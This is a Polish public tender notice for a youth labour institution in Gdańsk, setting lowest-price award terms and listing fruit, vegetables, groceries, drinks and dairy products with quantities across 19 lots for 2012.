<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca który spełni warunek określony w art. 22 ust.1 pkt.2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19) Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a) Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
b) Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
c) W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 605, VI piętro - sekretariat ogólny, ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2011 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro - ul. Uphagena 27, 80-237 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	100
banany	kg	150
brzoskwinie	kg	80
cytryny	kg	30
gruszki	kg	60
jabłka	kg	300
kiwi	kg	11
kiwi	szt	92
nektaryny	kg	50
maliny 500g	szt	8
maliny	kg	8
mandarynki	kg	80
pomarancza	kg	60
śliwki	kg	20
truskawki	kg	30
winogrona	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany450g	szt	48
brzoskwinie kons.0.9	szt	30
Dżem 7 kg	szt	10
Dżem  270g	szt	100
kompot wiśniowy 0,9 l	szt	50
sok owocowy 2l (różne smaki-pomarańcz	szt	30
grejfrut, jabłkowy, cz.pożeczka, mixitp)		
sok owocowy 1l (różne smaki-pomarań,	szt	45
gruszka, wiśnia, grejfrut,mix itp.)		
sok typu owocowy, warzywno -owocowe	szt	185
(marchew-trusk-banan, marchew-malina-		
banan, marchew-jabł-banan itp.) 220ml		
syrop owocowy 6,5l	szt	40
syrop owocowy 1l	szt	20
rodzynki suszone 100g	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody - botwina	szt	50
burak	kg	250
brokuł	szt	35
cebula	kg	350
cebula czerwona 	kg	5
czosnek	szt	25
fasola drobna 5kg	szt	5
fasola jaś	kg	25
fasola szparagowa	kg	15
groch łuska 0,5kg	szt	40
kapusta czerwona	kg	20
kapusta młoda 	szt	50
kapusta 	kg	200
kapusta pekińska	kg	80
kapusta pekińska	szt	40
kalafior	szt	65
koper	szt	100
koper duży	szt	15
marchew młoda	kg	50
marchew myta	kg	400
ogórek świeży	kg	250
papryka świeża	kg	80
pietruszka korzeń	kg	20
pomidor	kg	200
por 	szt	40
por 	kg	100
rzodkiewka pęczki	szt	120
sałata	szt	100
seler	kg	190
szczypiorek	szt	70
zielenina natka	szt	250
ziemniaki młode	kg	400
ziemniaki 	kg	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	15
fasolka czerwona konserw.	szt	10
groszek konserwowy 450g	szt	40
groszek z marchewką 0,9l	szt	20
kapusta kiszona  	kg	180
koncentrat pomidorowy 0,9l - 1l	szt	55
kukurydza konserwowa	szt	40
ogórki kiszone 	kg	100
ogórki małosolne	kg	15
ogórki konserwowe 0,9l	szt	90
papryka konserwowa 0,9l	szt	85
pieczarka	kg	80
pieczarka konserwowa 0,9l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	20
brokuły mroż. 2,5 kg	szt	8
Frytki 2 kg	szt	20
hamburger mrozony 	szt	180
kalafior mroż	kg	25
marchew kostka mroż	kg	50
mieszanka kompotowa 	kg	15
pizza 500g	szt	90
pyzy z mięsem  	kg	70
pyzy z owocami (knedle)	kg	60
truskawki mrozone	kg	10
warzywa na pat.chinskie	kg	10
zapiekanka 200g	szt	135
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	70
matijas	kg	20
makrela wędzona	kg	25
panga	kg	70
paprykarz 156g	szt	60
szprot w pomidorach	szt	50
śledź w pomidorach	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	30
kasza jęczm. Średnia	kg	40
mąka pszenna typu 500	kg	100
mąka pszenna typu 450	kg	70
mąka ziemiaczna	kg	25
płatki kukurydz. 250G	szt	30
platki kukur. 500 g	szt	50
platki kuku.kakaowe 250g	szt	20
platki kukur.kakaowe 500g	szt	50
płatki typu  chocapic	szt	20
ryż w woreczkach 0,5kg	szt	50
ryż 1kg	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   	szt	45
baton czekoladowy nadziewany	szt	135
baton czekoladowy w opakowaniu	szt	90
barszcz czerwony- koncentrat 300ml 	szt	35
bialy barszcz	szt	50
budyń 40g	szt	200
chrupki kukurydziane	szt	46
ciastka w polewie	kg	14
ciastka kruche	kg	14
ciastka typy pierniki	kg	14
ciastka typu wafelki	kg	14
cukier	kg	450
cukier puder  0,5 kg	szt	20
cukier waniliowy	szt	60
cukierki czekoladowe	kg	14
cukierki typu krówki	kg	9
cukierki owocowe	kg	6
cynamon 0,20g	szt	24
czekolada z orzechami	szt	45
czekolada nadziewana	szt	135
czekolada pełnomleczna	szt	180
czipsy 9g	szt	135
drożdże 100g	szt	40
galaretka owocowa	szt	150
herbata expres 100 szt	szt	100
herbata expr. Mietowa 20szt	szt	5
hebata expres owocowa 25szt	szt	10
herbata owoc.rozpusz gran.	szt	15
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	80
kawa rozpuszczalna zboż typu inka	szt	25
kawa rozpuszczalna naturalna	szt	5
kawa naturalna mielona 500g	szt	6
kakao rozpuszczalne 300g	szt	80
keczup 500g 	szt	50
keczup pikantny 0.5 	szt	24
Keczup 1 l	szt	5
kisiel 38g	szt	200
krem czekoladowy 200g	szt	250
krem czekoladowy 400g	szt	60
krem czekoladowo orzechowy 400g	szt	35
krem czekoladowo orzechowy 200g	szt	40
kwasek cytrynowy 20g	szt	100
liść laurowy 12g	szt	40
lizak kulka	szt	45
lizak  serduszko	szt	270
Łazanki 0.5	szt	35
magi w plynie 1 l	szt	37
makaron nitki  0.5 kg	szt	36
makaron gniazda 1kg	szt	20
makaron rurki 1 kg	szt	30
makaron świderki 1kg	szt	50
makaron spagetti 0,5kg	szt	70
majeranek 20g	szt	40
majeranek 150g	szt	8
majonez  400g 	szt	50
majonez   700g  	szt	20
majonez 900g do sałatek	szt	16
mikołaj czekoladowy	szt	46
miód sztuczny 200g	szt	46
miód sztuczny  5kg	szt	2
Miód naturalny 0,9 l	szt	8
musztarda  Sarepska 180g	szt	36
musztrda tuba 0.5 l	szt	14
Ocet 10%	szt	20
paluszki solone 0,400g	szt	24
paluszki z sezamem 70g	szt	135
papryka mielona 20g	szt	60
paprykarz szczeciń 131g	szt	90
paprykarz szczcz. 300G	szt	45
pasztet puszka 160g	szt	96
pasztet 135g z pomidorami	szt	96
pieprz mielony 20g	szt	300
pieprz ziolowy 20g	szt	30
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	8
proszek do pieczenia 0,20 g	szt	60
przyprawa gyros 30	szt	40
przyprawa do grilla 20g	szt	15
przyprawa do mięsa 20g  	szt	30
przyprawa do kurczaka 1 kg	szt	2
przyprawa do kurczaka	szt	50
rosól drobiowy 1 kg	szt	5
rosół drobiowy kostki 60g 	szt	30
sos  bolones 0,500l	szt	20
sos do deserów 1 l	szt	10
sos do hamburgerow 1 l	szt	10
sos fix do spagetti 45g	szt	100
sos mix koper-zioł, włoski itp. 9g	szt	100
sos salatkowy mix 700g	szt	8
sos słodko-kwaśny  0,5	szt	48
sos sojowy 1l	szt	4
sól	kg	180
wafelek w polewie	szt	92
wafelek b/polewy typu grzesiek	szt	230
vegeta 200g	szt	80
wiórki kokosowe 0,25	szt	10
zestaw świateczny (np.czelolada, baton, mikołaj)	szt	45
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	45
ziele angielskie	szt	25
ziele angielskie 600g 	szt	2
zupki  chińska(ostra,łagodna rosołowa itp.)	szt	320
zupki chińska	szt	45
zelatyna 50g	szt	25
żurek w butelce 0,5l	szt	30
zurek w proszku 60g	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem 500g	szt	300
Margaryna  do pieczenia 250g	szt	50
masło roślinne 200g	szt	15
oliwa z oliwek 1 l	szt	1
olej 1l	szt	110
olej 3l	szt	20
smalec	kg	3
smalec 200g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	70
napoje niegazowane 1,5 l	szt	70
napój gazowany 2l	szt	14
napój n/g 2 l	szt	14
napój energet	szt	138
Woda mineralna 0,5 gazowana	szt	138
Woda 0,5 n/g 	szt	138
woda mineralna n/g 1,5 l 	szt	92
woda mineralna g 1,5 l 	szt	92
Woda miner n/g 1,5 l 	szt	9
woda gazowana 1,5 l	szt	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas owoc	szt	10
arbuz	kg	50
banany	kg	50
brzoskwinie	kg	30
cytryny	kg	10
gruszki	kg	10
jabłka	kg	50
kiwi	kg	10
nektaryny	kg	25
maliny	kg	3
mandarynki	kg	33
pomarancza	kg	20
pomarańcza siatka	kg	10
rabarbar	kg	17
truskawki	kg	12
winogrona jasne	kg	17
winogrona ciemne	kg	17
wisnie	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserowany puszka	szt.	20
brzoskwinia konserwowa puszka	szt	16
Dżem owocowy 7 kg	szt	2
Dżem  słoik	szt	50
kompot truskawkowy 0,9 l	szt	9
marmolada owocowa 7kg	szt	1
sok owocowy 2l karton	szt	17
sok owocowy 1l karton	szt	10
syrop owocowy 6,5l 	szt	7
syrop owocowy 1l 	szt	8
rodzynki suszone 100g	szt	10
rodzynki suszone 0.5 kg	szt	3
śliwki suszone 250g	szt	5
żurawina	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	8
burak	kg	50
brokuł	szt	3
cebula	kg	150
cebula młoda	kg	33
cebula czerwona 	kg	3
czosnek	szt	17
fasola jaś 0,5kg	szt	7
fasola drobna 5kg	szt	1
fasola drobna 0,5 kg	szt	3
fasola jaś	kg	3
fasola szparagowa	kg	7
groch cały	kg	3
groch łuska	szt	8
kapusta czerwona	kg	8
kapusta młoda 	szt	17
kapusta 	kg	17
kapusta pekińska	szt	33
kapusta włoska	szt 	7
kalafior	szt	7
koper	szt	50
marchew młoda	kg	10
marchew myta	kg	50
ogórek świeży	kg	40
papryka świeża	kg	13
pietruszka korzeń	kg	40
pomidor	kg	50
por 	kg	40
rzodkiewka pęczki	szt	50
sałata	szt	27
sałata dekoracyjna	szt	33
sałata lodowa	szt	13
seler	kg	27
szczypiorek	szt	27
szparagi	szt	7
zielenina natka	szt	50
ziemniaki młode	kg	67
ziemniaki 	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty słoik	szt.	7
chrzan z żurawiną	szt	7
cebulka konserwowa 300g	szt	10
fasolka czerwona konserwowa	szt	10
groszek konserwowy 400g	szt	27
groszek z marchewką 0,9l	szt	8
kapusta kiszona  5kg	szt	7
koncentrat pomidorowy 0,9l	szt	10
koncentrat pomidorowy 1l	szt	7
kukurydza konserwowa	szt	10
oliwki zielone 200ml	szt	10
oliwki czarne 	szt	10
ogórki kiszone 3kg	szt	5
ogórki małosolne	kg	20
ogórki konserwowe 0,9l	szt	20
papryka konserwowa 0,9l	szt	15
pieczarka	kg	15
pieczarka konserwowa 0,9l	szt	12
seler w słoiku 0,250	szt	8
szczaw konserwowy 0,9l	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż. 0,5 kg	szt	3
brukselka mroż. 2,5 kg	szt	5
brokuły mroż. 2,5 kg	szt	5
frytki 450g	szt	12
Frytki 1,5 kg	szt	5
Frytki 2 kg	szt	7
groszek mrozony	kg	5
groszek mrozony 2,5 kg	szt	2
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	5
marchew kostka mroż 	kg	5
marchew z groszkiem 2,5 kg	szt	2
marchew z groszkiem mroż	kg	8
pizza 500g	szt	33
szpinak 1kg	szt	10
truskawki mrozone	kg	5
warzywa na patelnię	kg	7
warzywa na pat.chinskie	kg	3
zapiekanka 200g	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	7
karp	kg	2
łosoś filet	kg	5
lłosoś wędzony	kg	7
matijas	kg	3
mintaj wędzony	kg	2
paluszki rybne	kg	10
panga	kg	7
paprykarz 156g	szt	7
pstrąg świe.	kg	3
pstrąg wędzony	kg	7
szprot w pomidorach	szt	13
śledź w pomidorach	szt	13
tuńczyk  w sosie wł. 250G	szt	10
tunczyk w oleju 300g	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17- produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna 	kg.	3
kasza gryczana 1kg	szt	3
kasza jęczm. Średnia	kg	7
mąka pszenna typu 500	kg	13
mąka pszenna typu 450	kg	13
mąka ziemiaczna	kg	7
platki kukur. 500 g	szt	18
platki kukur.kakaowe 500g	szt	18
ryż 1kg 	szt	7
ryż 1kg	kg	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18- różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton	szt.	40
baton czekoladowy w opakowaniu	szt	40
baton nadziewany	szt	40
barszcz czerwony 220ml-koncentrat	szt	10
bialy barszcz 60g	szt	7
budyń	szt	17
chrupki kukurydziane	szt	17
ciastka w polewie	kg	3
ciastka kruche	kg	17
ciastka typy pierniki	kg	7
ciastka typu wafelki	kg	17
cukier	kg	170
cukier puder  0,5 kg	szt	3
cukier waniliowy	szt	11
cukierki czekoladowe	kg	20
cukierki krówki	kg	3
cukierki owocowe	kg	13
cynamon 0,20g	szt	7
czekolada pełnomleczna	szt	50
czipsy	szt	50
galaretka owocowa	szt	17
gofry	szt	33
herbata expres 100 szt	szt	43
herbata expres 50 szt	szt	7
hebata expres owocowa 25szt	szt	15
herbata 100szt  lub równoważna	szt	4
jarzynka 200g	szt	8
kawa rozpuszczalna zboż	szt	7
kawa rozpuszczalna 200g  lub równoważna	szt	12
kawa naturalna mielona 500ml	szt	97
kawa  500g  lub równoważna	szt	3
kakao  rozpuszczalne 500g	szt	13
keczup 500g 	szt	10
keczup pikantny 0.5 	szt	5
kisiel	szt	20
kminek 20g	szt	3
krem czekoladowy 200g	szt	50
krem czekoladowy 400g	szt	13
kwasek cytrynowy	szt	27
liść laurowy 12g	szt	5
lizak serduszko	szt	100
magi w plynie 1 l	szt	3
makaron nitki  0.5 kg	szt	13
makaron gniazda 1kg 	szt	13
makaron paczka  1kg	szt	7
makaron świderki 1kg	szt	7
makaron spagetti 0,5kg	szt	17
majeranek 20g	szt	7
majonez  sałatkowy 700g	szt	13
majonez sałatkowy 900g	szt	15
musztarda 	szt	10
musztrda tuba 0.5 l	szt	3
Ocet 10%	szt	7
paluszki solone 0,400g	szt	150
paluszki z sezamem	szt	160
papryka mielona 20g	szt	10
papryka mielona słodka1kg	szt	3
pasztet wielkopolski 131g lub równoważny	szt	13
pasztet wielk.z pomid. 131G  lub równoważny	szt	13
pieprz mielony 20g	szt	10
pieprz ziolowy 20g	szt	3
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	10
proszek do pieczenia	szt	13
przyprawa gyros 30	szt	7
przyprawa do kurczaka 1 kg	szt	3
przyprawa do kurczaka	szt	3
rosół drobiowy kost.	szt	17
sos typy bolones 0,500l	szt	10
sos do deserów 1 l	szt	3
sos do spagetti	szt	13
sos neapoli 1kg	szt	3
sos słodko-kwaśny	szt	20
sól	kg	33
wafelek duży(wafel z kremem)	szt	170
wafelek w polewie	szt	150
wafelek grześ w polewie	opk	102
wafelek b/polewy 	szt	50
vegeta 200g	szt	10
ziele angielskie	szt	5
zupki chińska (ostra,łagodna rosołowa itp.)	szt	67
zupki chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	33
zelatyna 50g	szt	3
żurek w butelce	szt	10
zurek w proszku	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> desrer monte lub równoważny	szt.	50
jogurt pitny	szt	50
jogurt  150g	szt	50
jogurt  150g	szt	50
lody 100g	szt	29
Lody-rolada 850g	szt	20
lody 1000g	szt	21
masło śmietank. 200G	szt	100
Mleko 2% 1l	szt	20
Mleko 3,2% 1l	szt	400
ser feta	szt	7
serek grani	szt	67
serek grani ze szczypiorem	szt	67
serek homogenizowany	szt	60
serek homogenizowany owoc.	szt	60
serek kanapk. Twarożk. 150g	szt	50
serek twaroż.  almette  lub równoważny	szt	50
ser twarogowy 200g	szt	15
ser twarogowy półtusty	kg	5
set topiony 200g	szt	30
ser top. krążek  	szt	45
ser topiony zegar 80g	szt	30
ser salami	kg	8
ser wędzony	kg	5
ser żółty  edamski	kg	5
ser żółty  królewski	kg	6
